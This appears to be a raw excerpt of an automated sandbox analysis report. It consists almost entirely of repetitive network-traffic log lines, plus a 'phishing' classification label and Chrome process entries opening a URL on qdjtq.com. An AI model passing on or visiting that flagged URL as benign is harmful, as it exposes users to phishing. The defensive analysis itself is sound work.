Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50277 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50304
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50315
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50316
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50310
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50312
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50276
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50277
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50279
Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50281
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50280
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50282
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50276 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50285
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50284
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50287
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50289
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50288
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50290
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50292
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50291
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50294
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50293
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50311 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50229 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50284 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50239 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 50314 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50268 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 50246 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49826 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49914 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50215 version: TLS 1.2
Source: classification engineClassification label: mal68.phis.win@20/554@151/43
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2000,i,5091690585223991164,14165352931940017661,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://qdjtq.com/modify/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2000,i,5091690585223991164,14165352931940017661,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
